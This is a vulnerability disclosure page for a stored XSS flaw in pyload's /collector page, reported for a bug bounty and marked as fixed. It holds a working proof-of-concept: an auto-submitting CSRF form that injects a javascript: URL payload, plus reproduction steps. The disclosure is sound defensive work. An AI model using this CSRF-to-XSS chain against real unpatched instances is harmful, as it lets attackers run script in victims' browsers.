Stored XSS in pyload/pyload

Valid

Reported on

Jan 9th 2023

Description

/collector page is vulnerable to stored XSS.

PoC

Open the following file in the browser:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:9666/flash/add" method="POST">
      <input type="hidden" name="package" value="XSS" />
      <input type="hidden" name="urls" value="javascript&#58;alert&#40;&#96;XSS&#96;&#41;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Login as user.
Go to http://localhost:9666/collector
Click XSS > alert(`XSS`)

Impact

An attacker can force a victim to run malicious JavaScript code.

We are processing your report and will contact the pyload team within 24 hours. 3 months ago

bAu modified the report

3 months ago

We have contacted a member of the pyload team and are waiting to hear back 3 months ago

A pyload/pyload maintainer validated this vulnerability 2 months ago

bAu has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

A pyload/pyload maintainer marked this as fixed in 0.5.0b3.dev42 with commit 46d75a 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

A pyload/pyload maintainer published this vulnerability 2 months ago

to join this conversation